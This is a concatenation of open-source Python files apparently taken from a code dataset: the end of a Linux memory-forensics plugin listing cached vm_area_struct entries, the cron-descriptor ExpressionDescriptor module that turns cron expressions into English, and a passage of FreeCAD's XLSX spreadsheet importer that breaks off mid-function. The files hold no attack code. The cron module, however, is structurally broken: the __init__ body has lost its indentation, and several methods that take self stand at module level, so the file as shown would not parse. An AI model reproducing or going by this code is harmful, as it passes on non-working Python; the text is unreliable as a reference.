        """Yield (task_name, pid, start, end, path) per cached vm_area_struct."""
        linux_common.set_plugin_members(self)
        # mm_struct.owner only exists on some kernel configurations.
        has_owner = self.profile.obj_has_member("mm_struct", "owner")
        cache = linux_slabinfo(self._config).get_kmem_cache("vm_area_struct", self._config.UNALLOCATED)
        for vm in cache:
            start = vm.vm_start
            end = vm.vm_end
            if has_owner and vm.vm_mm and vm.vm_mm.is_valid():
                task = vm.vm_mm.owner
                (task_name, pid) = (task.comm, task.pid)
            else:
                # No resolvable owning task; emit empty placeholders.
                (task_name, pid) = ("", "")
            if vm.vm_file and vm.vm_file.is_valid():
                path = vm.vm_file.dentry.get_partial_path()
            else:
                path = ""
            yield task_name, pid, start, end, path
    def render_text(self, outfd, data):
        """Render the tuples from calculate() as a text table."""
        self.table_header(outfd, [("Process", "16"),
                                  ("PID", "6"),
                                  ("Start", "[addrpad]"),
                                  ("End", "[addrpad]"),
                                  ("Path", "")])
        for task_name, pid, start, end, path in data:
            self.table_row(outfd, task_name, pid, start, end, path)
| gpl-2.0 |
Salamek/cron-descriptor | cron_descriptor/ExpressionDescriptor.py | 1 | 22709 | # The MIT License (MIT)
#
# Copyright (c) 2016 Adam Schubert
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import datetime
import calendar
from .GetText import GetText
from .CasingTypeEnum import CasingTypeEnum
from .DescriptionTypeEnum import DescriptionTypeEnum
from .ExpressionParser import ExpressionParser
from .Options import Options
from .StringBuilder import StringBuilder
from .Exception import FormatException, WrongArgumentException
class ExpressionDescriptor(object):
    """
    Converts a Cron Expression into a human readable string
    """
    # Characters that mark a composite field (step / range / list / any).
    _special_characters = ['/', '-', ',', '*']
    # Class-level defaults; __init__ rebinds these per instance.
    _expression = ''
    _options = None
    _expression_parts = []
    _parsed = False
def __init__(self, expression, options=None, **kwargs):
"""Initializes a new instance of the ExpressionDescriptorclass
Args:
expression: The cron expression string
options: Options to control the output description
Raises:
WrongArgumentException: if kwarg is unknow
"""
if options is None:
options = Options()
self._expression = expression
self._options = options
self._expression_parts = []
self._parsed = False
# if kwargs in _options, overwrite it, if not raise exeption
for kwarg in kwargs:
if hasattr(self._options, kwarg):
setattr(self._options, kwarg, kwargs[kwarg])
else:
raise WrongArgumentException(
"Unknow {} configuration argument".format(kwarg))
# Initializes localization
GetText(options.locale_code)
    def get_description(self, description_type=DescriptionTypeEnum.FULL):
        """Generates a human readable string for the Cron Expression

        Args:
            description_type: Which part(s) of the expression to describe
        Returns:
            The cron expression description
        Raises:
            Exception: if throw_exception_on_parse_error is True
        """
        try:
            # Parse the expression once and cache the parts on the instance.
            if self._parsed is False:
                parser = ExpressionParser(self._expression, self._options)
                self._expression_parts = parser.parse()
                self._parsed = True
            # Dispatch table; unknown types fall back to SECONDS.
            choices = {
                DescriptionTypeEnum.FULL: self.get_full_description,
                DescriptionTypeEnum.TIMEOFDAY: self.get_time_of_day_description,
                DescriptionTypeEnum.HOURS: self.get_hours_description,
                DescriptionTypeEnum.MINUTES: self.get_minutes_description,
                DescriptionTypeEnum.SECONDS: self.get_seconds_description,
                DescriptionTypeEnum.DAYOFMONTH: self.get_day_of_month_description,
                DescriptionTypeEnum.MONTH: self.get_month_description,
                DescriptionTypeEnum.DAYOFWEEK: self.get_day_of_week_description,
                DescriptionTypeEnum.YEAR: self.get_year_description,
            }
            description = choices.get(description_type, self.get_seconds_description)()
        except Exception as ex:
            if self._options.throw_exception_on_parse_error:
                raise
            else:
                # Swallow the error and return its message as the description.
                description = str(ex)
        return description
    def get_full_description(self):
        """Generates the FULL description

        Returns:
            The FULL description
        Raises:
            FormatException: if formatting fails and throw_exception_on_parse_error is True
        """
        try:
            time_segment = self.get_time_of_day_description()
            day_of_month_desc = self.get_day_of_month_description()
            month_desc = self.get_month_description()
            day_of_week_desc = self.get_day_of_week_description()
            year_desc = self.get_year_description()
            description = "{0}{1}{2}{3}{4}".format(
                time_segment,
                day_of_month_desc,
                day_of_week_desc,
                month_desc,
                year_desc)
            description = self.transform_verbosity(
                description, self._options.verbose)
            description = self.transform_case(
                description,
                self._options.casing_type)
        except Exception:
            # NOTE(review): msgid below misspells "occurred"; changing it
            # would invalidate existing translation catalogs.
            description = _(
                "An error occured when generating the expression description. Check the cron expression syntax.")
            if self._options.throw_exception_on_parse_error:
                raise FormatException(description)
        return description
    def get_time_of_day_description(self):
        """Generates a description for only the TIMEOFDAY portion of the expression

        Returns:
            The TIMEOFDAY description
        """
        seconds_expression = self._expression_parts[0]
        minute_expression = self._expression_parts[1]
        hour_expression = self._expression_parts[2]
        description = StringBuilder()
        # handle special cases first
        if any(exp in minute_expression for exp in self._special_characters) is False and \
                any(exp in hour_expression for exp in self._special_characters) is False and \
                any(exp in seconds_expression for exp in self._special_characters) is False:
            # specific time of day (i.e. 10 14)
            description.append(_("At "))
            description.append(
                self.format_time(
                    hour_expression,
                    minute_expression,
                    seconds_expression))
        elif "-" in minute_expression and \
                "," not in minute_expression and \
                any(exp in hour_expression for exp in self._special_characters) is False:
            # minute range in single hour (i.e. 0-10 11)
            minute_parts = minute_expression.split('-')
            description.append(_("Every minute between {0} and {1}").format(
                self.format_time(hour_expression, minute_parts[0]), self.format_time(hour_expression, minute_parts[1])))
        elif "," in hour_expression and "-" not in hour_expression and \
                any(exp in minute_expression for exp in self._special_characters) is False:
            # hours list with single minute (o.e. 30 6,14,16)
            hour_parts = hour_expression.split(',')
            description.append(_("At"))
            for i, hour_part in enumerate(hour_parts):
                description.append(" ")
                description.append(
                    self.format_time(hour_part, minute_expression))
                # Oxford-style joining: commas between items, "and" last.
                if i < (len(hour_parts) - 2):
                    description.append(",")
                if i == len(hour_parts) - 2:
                    description.append(_(" and"))
        else:
            # default time description: combine the three field descriptions
            seconds_description = self.get_seconds_description()
            minutes_description = self.get_minutes_description()
            hours_description = self.get_hours_description()
            description.append(seconds_description)
            if description:
                description.append(", ")
            description.append(minutes_description)
            if description:
                description.append(", ")
            description.append(hours_description)
        return str(description)
    def get_seconds_description(self):
        """Generates a description for only the SECONDS portion of the expression

        Returns:
            The SECONDS description
        """
        # Lambdas, in order: all ('*'), single item, interval ('/'),
        # between ('-') template, specific-value template.
        return self.get_segment_description(
            self._expression_parts[0],
            _("every second"),
            lambda s: s,
            lambda s: _("every {0} seconds").format(s),
            lambda s: _("seconds {0} through {1} past the minute"),
            lambda s: _("at {0} seconds past the minute")
        )
    def get_minutes_description(self):
        """Generates a description for only the MINUTE portion of the expression

        Returns:
            The MINUTE description
        """
        # Minute "0" yields an empty specific-value description so it can be
        # folded into the hour text.
        return self.get_segment_description(
            self._expression_parts[1],
            _("every minute"),
            lambda s: s,
            lambda s: _("every {0} minutes").format(s),
            lambda s: _("minutes {0} through {1} past the hour"),
            lambda s: '' if s == "0" else _("at {0} minutes past the hour")
        )
    def get_hours_description(self):
        """Generates a description for only the HOUR portion of the expression

        Returns:
            The HOUR description
        """
        expression = self._expression_parts[2]
        # Single hours are rendered as full clock times ("HH:00").
        return self.get_segment_description(
            expression,
            _("every hour"),
            lambda s: self.format_time(s, "0"),
            lambda s: _("every {0} hours").format(s),
            lambda s: _("between {0} and {1}"),
            lambda s: _("at {0}")
        )
    def get_day_of_week_description(self):
        """Generates a description for only the DAYOFWEEK portion of the expression

        Returns:
            The DAYOFWEEK description
        """
        if self._expression_parts[5] == "*" and self._expression_parts[3] != "*":
            # DOM is specified and DOW is * so to prevent contradiction like "on day 1 of the month, every day"
            # we will not specified a DOW description.
            return ""
        def get_day_name(s):
            # Strip any "#n" (nth weekday) or "L" (last) decoration before
            # mapping the numeric day to its name.
            exp = s
            if "#" in s:
                exp, useless = s.split("#", 2)
            elif "L" in s:
                exp = exp.replace("L", '')
            return self.number_to_day(int(exp))
        def get_format(s):
            # Choose the sentence template based on "#n"/"L" decorations.
            if "#" in s:
                day_of_week_of_month = s[s.find("#") + 1:]
                try:
                    day_of_week_of_month_number = int(day_of_week_of_month)
                    # NOTE(review): msgid "forth" misspells "fourth";
                    # fixing it would break translation catalogs.
                    choices = {
                        1: _("first"),
                        2: _("second"),
                        3: _("third"),
                        4: _("forth"),
                        5: _("fifth"),
                    }
                    day_of_week_of_month_description = choices.get(day_of_week_of_month_number, '')
                except ValueError:
                    day_of_week_of_month_description = ''
                formated = "{}{}{}".format(_(", on the "),
                                           day_of_week_of_month_description, _(" {0} of the month"))
            elif "L" in s:
                formated = _(", on the last {0} of the month")
            else:
                formated = _(", only on {0}")
            return formated
        return self.get_segment_description(
            self._expression_parts[5],
            _(", every day"),
            lambda s: get_day_name(s),
            lambda s: _(", every {0} days of the week").format(s),
            lambda s: _(", {0} through {1}"),
            lambda s: get_format(s)
        )
    def get_month_description(self):
        """Generates a description for only the MONTH portion of the expression

        Returns:
            The MONTH description
        """
        # Month names come from strftime("%B") on an arbitrary day of the
        # current year (locale-dependent).
        return self.get_segment_description(
            self._expression_parts[4],
            '',
            lambda s: datetime.date(datetime.date.today().year, int(s), 1).strftime("%B"),
            lambda s: _(", every {0} months").format(s),
            lambda s: _(", {0} through {1}"),
            lambda s: _(", only in {0}")
        )
    def get_day_of_month_description(self):
        """Generates a description for only the DAYOFMONTH portion of the expression

        Returns:
            The DAYOFMONTH description
        """
        expression = self._expression_parts[3]
        # "?" is equivalent to "*" in the day-of-month field.
        expression = expression.replace("?", "*")
        if expression == "L":
            description = _(", on the last day of the month")
        elif expression == "LW" or expression == "WL":
            description = _(", on the last weekday of the month")
        else:
            # "nW"/"Wn": the weekday nearest to day n.
            regex = re.compile("(\\d{1,2}W)|(W\\d{1,2})")
            if regex.match(expression):
                m = regex.match(expression)
                day_number = int(m.group().replace("W", ""))
                day_string = _("first weekday") if day_number == 1 else _("weekday nearest day {0}").format(
                    day_number)
                description = _(", on the {0} of the month").format(
                    day_string)
            else:
                # NOTE: the interval lambda returns an unformatted template
                # for the non-"1" case; get_segment_description applies
                # .format() to the result afterwards, so this still works.
                description = self.get_segment_description(
                    expression,
                    _(", every day"),
                    lambda s: s,
                    lambda s: _(", every day") if s == "1" else _(", every {0} days"),
                    lambda s: _(", between day {0} and {1} of the month"),
                    lambda s: _(", on day {0} of the month")
                )
        return description
    def get_year_description(self):
        """Generates a description for only the YEAR portion of the expression

        Returns:
            The YEAR description
        """
        def format_year(s):
            # Numeric years are normalized through strftime; datetime.date
            # cannot represent years before 1900, so return those as ints.
            regex = re.compile(r"^\d+$")
            if regex.match(s):
                year_int = int(s)
                if year_int < 1900:
                    return year_int
                return datetime.date(year_int, 1, 1).strftime("%Y")
            else:
                return s
        return self.get_segment_description(
            self._expression_parts[6],
            '',
            lambda s: format_year(s),
            lambda s: _(", every {0} years").format(s),
            lambda s: _(", {0} through {1}"),
            lambda s: _(", only in {0}")
        )
    def get_segment_description(
        self,
        expression,
        all_description,
        get_single_item_description,
        get_interval_description_format,
        get_between_description_format,
        get_description_format
    ):
        """Returns segment description

        Args:
            expression: Segment to descript
            all_description: *
            get_single_item_description: 1
            get_interval_description_format: 1/2
            get_between_description_format: 1-2
            get_description_format: format get_single_item_description
        Returns:
            segment description
        """
        description = None
        if expression is None or expression == '':
            description = ''
        elif expression == "*":
            description = all_description
        elif any(ext in expression for ext in ['/', '-', ',']) is False:
            # Plain single value.
            description = get_description_format(expression).format(
                get_single_item_description(expression))
        elif "/" in expression:
            # Step expression: "<base>/<step>".
            segments = expression.split('/')
            description = get_interval_description_format(
                segments[1]).format(get_single_item_description(segments[1]))
            # interval contains 'between' piece (i.e. 2-59/3 )
            if "-" in segments[0]:
                between_segment_description = self.generate_between_segment_description(
                    segments[0], get_between_description_format, get_single_item_description)
                if not between_segment_description.startswith(", "):
                    description += ", "
                description += between_segment_description
            elif any(ext in segments[0] for ext in ['*', ',']) is False:
                # Step with a plain starting value (i.e. 5/15).
                range_item_description = get_description_format(segments[0]).format(
                    get_single_item_description(segments[0])
                )
                range_item_description = range_item_description.replace(", ", "")
                description += _(", starting {0}").format(range_item_description)
        elif "," in expression:
            # Comma-separated list, possibly containing ranges.
            segments = expression.split(',')
            description_content = ''
            for i, segment in enumerate(segments):
                # Join items with commas, and "and" before the last one.
                if i > 0 and len(segments) > 2:
                    description_content += ","
                    if i < len(segments) - 1:
                        description_content += " "
                if i > 0 and len(segments) > 1 and (i == len(segments) - 1 or len(segments) == 2):
                    description_content += _(" and ")
                if "-" in segment:
                    between_description = self.generate_between_segment_description(
                        segment,
                        lambda s: _(", {0} through {1}"),
                        get_single_item_description
                    )
                    between_description = between_description.replace(", ", "")
                    description_content += between_description
                else:
                    description_content += get_single_item_description(segment)
            description = get_description_format(
                expression).format(
                description_content)
        elif "-" in expression:
            # Simple range.
            description = self.generate_between_segment_description(
                expression, get_between_description_format, get_single_item_description)
        return description
def generate_between_segment_description(
    self,
    between_expression,
    get_between_description_format,
    get_single_item_description
):
    """Build the description for a hyphenated 'between' segment.

    :param between_expression: expression of the form "<start>-<end>"
    :param get_between_description_format: callable returning the format string
    :param get_single_item_description: callable describing a single value
    :return: The between segment description
    """
    parts = between_expression.split('-')
    start_description = get_single_item_description(parts[0])
    # An end value like "5:00" really means "up to 5:59".
    end_description = get_single_item_description(parts[1]).replace(":00", ":59")
    between_format = get_between_description_format(between_expression)
    return between_format.format(start_description, end_description)
def format_time(
    self,
    hour_expression,
    minute_expression,
    second_expression=''
):
    """Construct a formatted time description from its parts.

    Args:
        hour_expression: Hours part
        minute_expression: Minutes part
        second_expression: Seconds part (optional)
    Returns:
        Formatted time description, e.g. "09:05 AM" or "21:05"
    """
    hour = int(hour_expression)
    suffix = ''
    if self._options.use_24hour_time_format is False:
        # 12-hour clock: choose the AM/PM marker before wrapping the hour.
        suffix = " PM" if hour >= 12 else " AM"
        if hour > 12:
            hour -= 12
    minute = int(minute_expression)
    seconds = ''
    if second_expression:
        seconds = ":{}".format(str(int(second_expression)).zfill(2))
    return "{0}:{1}{2}{3}".format(
        str(hour).zfill(2), str(minute).zfill(2), seconds, suffix)
def transform_verbosity(self, description, use_verbose_format):
    """Strip verbose phrases from the description unless verbosity is wanted.

    Args:
        description: The description to transform
        use_verbose_format: If True, leave the description as is; if False,
            remove the ", every minute/hour/day" phrases.
    Returns:
        The transformed description with proper verbosity
    """
    if use_verbose_format is False:
        # These phrases are implied by the rest of the description.
        for phrase in (_(", every minute"), _(", every hour"), _(", every day")):
            description = description.replace(phrase, '')
    return description
def transform_case(self, description, case_type):
    """Apply the configured casing to the expression description.

    Args:
        description: The description to transform
        case_type: CasingTypeEnum value controlling the output casing
    Returns:
        The transformed description with proper casing
    """
    if case_type == CasingTypeEnum.Sentence:
        # Capitalise only the first character, leaving the rest untouched.
        return "{}{}".format(description[0].upper(), description[1:])
    if case_type == CasingTypeEnum.Title:
        return description.title()
    return description.lower()
def number_to_day(self, day_number):
    """Return the localized day name for a CRON day-of-week number.

    CRON weeks start on Sunday (0) while ``calendar.day_name`` starts on
    Monday, so the lookup table is rotated by one position.

    Args:
        day_number: CRON day number, 0 (Sunday) through 6 (Saturday)
    Returns:
        Localized day name corresponding to day_number
    Raises:
        IndexError: When day_number is out of range
    """
    sunday_first = [calendar.day_name[(i + 6) % 7] for i in range(7)]
    return sunday_first[day_number]
def __str__(self):
    """Return the full human-readable cron expression description."""
    return self.get_description()

def __repr__(self):
    """Mirror __str__ so debugging output shows the description."""
    return self.get_description()
def get_description(expression, options=None):
    """Generate a human readable string for the Cron Expression.

    Args:
        expression: The cron expression string
        options: Options to control the output description
    Returns:
        The cron expression description
    """
    return ExpressionDescriptor(expression, options).get_description(
        DescriptionTypeEnum.FULL)
| mit |
usakhelo/FreeCAD | src/Mod/Spreadsheet/importXLSX.py | 2 | 14873 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# importXLSX.py
#
# This library imports an Excel-XLSX-file into FreeCAD.
#
# Copyright (C) 2016 Ulrich Brammer <ulrich1a@users.sourceforge.net>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA
from __future__ import print_function
__title__="FreeCAD Spreadsheet Workbench - XLSX importer"
__author__ = "Ulrich Brammer <ulrich1a@users.sourceforge.net>"
__url__ = ["http://www.freecadweb.org"]
'''
This library imports an Excel-XLSX-file into FreeCAD.
Version 1.1, Nov. 2016:
Changed parser, adds rad-unit to trigonometric functions in order
to give the same result in FreeCAD.
Added factor to arcus-function in order to give the same result in FreeCAD
Added support for celltype "inlineStr"
Version 1.0:
It uses a minimal parser, in order to translate the IF-function into
the different FreeCAD version.
The other function-names are translated by search and replace.
Features:
- Imports tables defined inside Excel-document
- Set alias definitions
- Translate formulas known by FreeCAD. (see tokenDic as by version 1.1)
- set cross table references
- strings are imported
- references to cells with strings are working
known issues:
- units are not imported
- string support is minimal, the same as in FreeCAD
'''
import zipfile
import xml.dom.minidom
import FreeCAD as App
# Detect whether a GUI is available: importing FreeCADGui fails when
# FreeCAD runs in console mode.
try:
    import FreeCADGui
except ImportError:
    # A failed module import raises ImportError, not ValueError; catching
    # ValueError let console-mode runs crash on this import.
    gui = False
else:
    gui = True
# Keep a reference to the builtin open() (Python 2 check) because this
# module defines its own open() below as the FreeCAD importer entry point.
if open.__module__ == '__builtin__':
    pythonopen = open
# The sepToken structure is used in the tokenizer functions isKey and
# getNextToken.
# sepToken defines a search tree for separator tokens with length of 1 to 3 characters
# it is also used as a list of separators between other tokens.
sepToken = {
    '(':None,
    '=':None,
    '<':'branchLower',  # may continue as '<=' or '<>'
    '>':'branchHigher',  # may continue as '>='
    ')':None,
#    '"':None,
#    ';':None,
    ' ':None,
    ',':None, # Separator on lists
    '!':None, #Connector to cells on other Sheets
    '+':None,
    '-':None,
    '*':None,
    '/':None,
    '^':None
    }

# Continuations of '<': '<>' (not equal) and '<=' (less or equal).
branchLower ={
    '>':None,
    '=':None
    }

# Continuation of '>': '>=' (greater or equal).
branchHigher = {'=':None}

# Needed to get a reference from a string to a dict
treeDict = {
    'branchLower':branchLower,
    'branchHigher':branchHigher
    }

# The tokenDic is used in parseExpr.
# The tokenDic contains the following information:
# levelchange: -1: tree down, 0, +1: tree up
# replacement token
# function-state: needed to do something special in the parser
#   0 = normal, 1 = the pi-case, 2 = angle-function,
#   3 = IF-function, 4 = IF-truecase, 5 IF-falsecase
tokenDic = {
    '(' :( 1, '(', 0),
    '=' :( 0 ,'==', 0),
    '<>' :( 0 ,'!=', 0),
    '>=' :( 0 ,'>=', 0),
    '<=' :( 0 ,'<=', 0),
    '<' :( 0 ,'<', 0),
    '>' :( 0 ,'>', 0),
    ',' :( 0 ,',', 0),
    ')' :(-1 ,')', 0),
    '!' :( 0 ,'.', 0), #Connector to cells on other Sheets
#    '"' :( 2 ,'', 0),
    '+' :( 0 ,'+', 0),
    '-' :( 0 ,'-', 0),
    '*' :( 0 ,'*', 0),
    '/' :( 0 ,'/', 0),
    '^' :( 0 ,'^', 0),
    'IF' :( 0, '', 3),
    'ABS' :( 0, 'abs', 0),
    'ACOS' :( 0, 'pi/180deg*acos', 0),
    'ASIN' :( 0, 'pi/180deg*asin', 0),
    'ATAN' :( 0, 'pi/180deg*atan', 0),
    'ATAN2':( 0, 'pi/180deg*atan2',0),
    'COS' :( 0, 'cos', 2),
    'COSH' :( 0, 'cosh', 2),
    'EXP' :( 0, 'exp', 0),
    'LOG' :( 0, 'log', 0),
    'LOG10':( 0, 'log10',0),
    'MOD' :( 0, 'mod', 0),
    'POWER':( 0, 'pow', 0),
    'SIN' :( 0, 'sin', 2),
    'SINH' :( 0, 'sinh', 2),
    'SQRT' :( 0, 'sqrt', 0),
    'TAN' :( 0, 'tan', 2),
    'TANH' :( 0, 'tanh', 2),
    'AVERAGE':( 0, 'average', 0),
    'COUNT':( 0, 'count',0),
    'MAX' :( 0, 'max', 0),
    'MIN' :( 0, 'min', 0),
    'STDEVA':( 0, 'stddev',0),
    'SUM' :( 0, 'sum', 0),
    'PI' :( 0, 'pi', 1)
    }
class exprNode(object):
    """One node of the expression parse tree.

    The tree is built while stepping down into the nesting levels of an
    Excel formula expression.
    """

    def __init__(self, parent, state, actIndex):
        # State used for angle functions and the IF function (see tokenDic).
        self.state = state
        # Parent tree node (None for the root).
        self.parent = parent
        # Index into the token list where this node continues parsing.
        self.lIndex = actIndex
        # Accumulated translated expression text for this subtree.
        self.result = ''
class FormulaTranslator(object):
    '''This class translates a cell-formula from Excel to FreeCAD.

    The formula is first split into tokens (getNextToken), then parsed
    into an exprNode tree (parseExpr) while the translated FreeCAD
    expression is accumulated in the nodes' ``result`` strings.
    '''

    def __init__(self):
        # A FreeCAD cell formula always starts with '='.
        self.tokenList = ['=']

    def translateForm(self, actExpr):
        """Tokenize and parse *actExpr*; return the FreeCAD formula string."""
        self.getNextToken(actExpr)
        #print("tokenList: ", self.tokenList)
        self.resultTree = exprNode(None, 0, 1)
        self.resultTree.result = self.tokenList[0]
        self.parseExpr(self.resultTree)
        #print('parseResult: ', self.resultTree.result)
        return self.resultTree.result

    def getNextToken(self, theExpr):
        ''' This is the recursive tokenizer for an excel formula.
        It appends all identified tokens to self.tokenList.'''
        #print('next Token theExpr: ', theExpr)
        #print('actTList: ', self.tokenList)
        tokenComplete = False
        keyToken = False
        if len(theExpr)>0:
            theTok = theExpr[0]
            theExpr = theExpr[1:]
            if theTok in sepToken:
                keyToken = True
                branch = sepToken[theTok]
                # Follow the separator search tree to recognise
                # multi-character operators such as '<=', '>=' and '<>'.
                while branch:
                    #print(branch, ' theExpr[0]: ',theExpr[0])
                    if theExpr[0] in treeDict[branch]:
                        branch = treeDict[branch][theExpr[0]]
                        theTok = theTok + theExpr[0]
                        theExpr = theExpr[1:]
                    else:
                        branch= None
                tokenComplete = True
                self.tokenList.append(theTok)
                self.getNextToken(theExpr)
            else:
                # Accumulate characters until the next separator starts.
                if len(theExpr)>0:
                    while (not tokenComplete):
                        if not self.isKey(theExpr):
                            theTok = theTok + theExpr[0]
                            theExpr = theExpr[1:]
                            if len(theExpr) == 0:
                                tokenComplete = True
                        else:
                            tokenComplete = True
                self.tokenList.append(theTok)
                self.getNextToken(theExpr)

    def isKey(self, theExpr):
        """Return True when *theExpr* starts with a (complete) separator token."""
        #print('look up: ', theExpr)
        keyToken = False
        lenExpr = len(theExpr)
        if theExpr[0] in sepToken:
            branch = sepToken[theExpr[0]]
            if branch == None:
                keyToken = True
            else:
                #print('There is a branch. look up: ', theExpr[1])
                if (lenExpr > 1) and (theExpr[1] in treeDict[branch]):
                    branch = treeDict[branch][theExpr[0]]
                    if branch == None:
                        keyToken = True
                    else:
                        if (lenExpr > 2) and (theExpr[2] in treeDict[branch]):
                            keyToken = True
                else:
                    keyToken = True
        return keyToken

    def parseExpr(self, treeNode):
        """Recursively translate the tokens starting at treeNode.lIndex,
        appending the translated text to the nodes' result strings."""
        token = self.tokenList[treeNode.lIndex]
        treeNode.lIndex += 1
        if token in tokenDic:
            lChange, newToken, funcState = tokenDic[token]
        else:
            # Unknown tokens (cell references, numbers, names) pass through.
            lChange = 0
            newToken = token
            funcState = 0
        #print('treeNode.state: ', treeNode.state, ' my.index: ', treeNode.lIndex-1, ' ', token, ' fState: ', funcState)
        if token == ',':
            # Inside an IF() the argument separators become '?' and ':'
            # of FreeCAD's conditional expression.
            if (treeNode.state == 4):
                newToken = ':'
                treeNode.state = 6
            if (treeNode.state == 3):
                newToken = '?'
                treeNode.state = 4
        if funcState == 3:
            # IF-function: parsed by a dedicated subtree.
            funcState = 0
            newNode = exprNode(treeNode, 3, treeNode.lIndex)
            self.parseIF(newNode)
        else:
            treeNode.result = treeNode.result + newToken
            if funcState == 2:
                # Trigonometric function: wrap the argument in rad-units.
                funcState = 0
                newNode = exprNode(treeNode, 2, treeNode.lIndex)
                self.parseAngle(newNode)
                treeNode.result = treeNode.result + ')'
            elif funcState == 1:
                treeNode.lIndex += 2 # do skip the 2 parentheses of the PI()
        if lChange == -1:
            #print 'state: ', treeNode.state, 'parent.result: ', treeNode.parent.result, ' mine: ', treeNode.result
            # Closing parenthesis: hand the accumulated result up one level.
            treeNode.parent.result = treeNode.parent.result + treeNode.result
            treeNode.parent.lIndex = treeNode.lIndex
            #print('Go one level up, state: ', treeNode.state)
            if (treeNode.state < 2):
                #print(' Look up more token above')
                if treeNode.lIndex < len(self.tokenList):
                    self.parseExpr(treeNode.parent)
        elif lChange == 1:
            #print('Go one level down')
            newNode = exprNode(treeNode, 1, treeNode.lIndex)
            self.parseExpr(newNode)
            treeNode.lIndex = newNode.lIndex
        else:
            if treeNode.lIndex < len(self.tokenList):
                #print('parse to the end')
                self.parseExpr(treeNode)

    def parseIF(self, treeNode):
        """Parse an IF(cond, a, b) into FreeCAD's (cond ? a : b) form."""
        #print('IF state: ', treeNode.state)
        treeNode.result = treeNode.result + '('
        treeNode.lIndex += 1
        self.parseExpr(treeNode)
        #print('IF result: ', treeNode.result)
        return

    def parseAngle(self, treeNode):
        """Parse a trigonometric argument, multiplying it by 1rad so the
        FreeCAD result matches Excel's radian semantics."""
        #print('Angle state: ', treeNode.state)
        treeNode.result = treeNode.result + '(1rad*('
        treeNode.lIndex += 1
        self.parseExpr(treeNode)
        #print('angle result: ', treeNode.result)
def getText(nodelist):
    """Concatenate the text of all TEXT_NODE entries in *nodelist*."""
    return ''.join(node.data for node in nodelist
                   if node.nodeType == node.TEXT_NODE)
def handleWorkSheet(theDom, actSheet, strList):
    """Transfer every cell of the worksheet DOM *theDom* into the FreeCAD
    spreadsheet *actSheet*; *strList* is the shared-strings table."""
    for rowElement in theDom.getElementsByTagName("row"):
        handleCells(rowElement.getElementsByTagName("c"), actSheet, strList)
def handleCells(cellList, actCellSheet, sList):
    """Write the values and formulas of the XLSX cell elements in *cellList*
    into the FreeCAD spreadsheet *actCellSheet*.

    sList is the shared-strings table; cells of type 's' index into it.
    """
    for cell in cellList:
        cellAtts = cell.attributes
        refRef = cellAtts.getNamedItem("r")
        # Cell reference such as "A1".
        ref = getText(refRef.childNodes)
        refType = cellAtts.getNamedItem("t")
        if refType:
            cellType = getText(refType.childNodes)
        else:
            cellType = 'n' # FIXME: some cells don't have t and s attributes
        #print("reference: ", ref, ' Cell type: ', cellType)
        if cellType == 'inlineStr':
            # Inline string: the text is stored directly in the cell.
            iStringList = cell.getElementsByTagName("is")
            #print('iString: ', iStringList)
            for stringEle in iStringList:
                tElement = stringEle.getElementsByTagName('t')[0]
                theString = getText(tElement.childNodes)
                #print('theString: ', theString)
                actCellSheet.set(ref, theString.encode('utf8'))
        formulaRef = cell.getElementsByTagName("f")
        if len(formulaRef)==1:
            # Formula cell: translate the Excel formula to FreeCAD syntax.
            theFormula = getText(formulaRef[0].childNodes)
            #print("theFormula: ", theFormula)
            fTrans = FormulaTranslator()
            actCellSheet.set(ref, fTrans.translateForm(theFormula))
        else:
            valueRef = cell.getElementsByTagName("v")
            #print('valueRef: ', valueRef)
            if len(valueRef)==1:
                valueRef = cell.getElementsByTagName("v")[0]
                if valueRef:
                    theValue = getText(valueRef.childNodes)
                    #print("theValue: ", theValue)
                    if cellType == 'n':
                        # Plain number: stored as its text representation.
                        actCellSheet.set(ref, theValue)
                    if cellType == 's':
                        # Shared string: theValue is an index into sList.
                        actCellSheet.set(ref, (sList[int(theValue)]).encode('utf8'))
def handleWorkBook(theBook, sheetDict, Doc):
    """Create a FreeCAD spreadsheet object for every sheet of the workbook
    DOM *theBook* and register the workbook's alias (defined name)
    definitions.

    sheetDict maps each sheet name to a tuple
    (FreeCAD sheet object, worksheet file name inside the archive).
    """
    theSheets = theBook.getElementsByTagName("sheet")
    #print("theSheets: ", theSheets)
    for sheet in theSheets:
        sheetAtts = sheet.attributes
        nameRef = sheetAtts.getNamedItem("name")
        sheetName = getText(nameRef.childNodes)
        #print("table name: ", sheetName)
        idRef = sheetAtts.getNamedItem("sheetId")
        # Worksheet XML files are named after the sheet id, e.g. "sheet1.xml".
        sheetFile = "sheet" + getText(idRef.childNodes) + '.xml'
        #print("sheetFile: ", sheetFile)
        # add FreeCAD-spreadsheet
        sheetDict[sheetName] = (Doc.addObject('Spreadsheet::Sheet', sheetName), sheetFile)
    theAliases = theBook.getElementsByTagName("definedName")
    for theAlias in theAliases:
        aliAtts = theAlias.attributes
        nameRef = aliAtts.getNamedItem("name")
        aliasName = getText(nameRef.childNodes)
        #print("aliasName: ", aliasName)
        aliasRef = getText(theAlias.childNodes)
        if '$' in aliasRef:
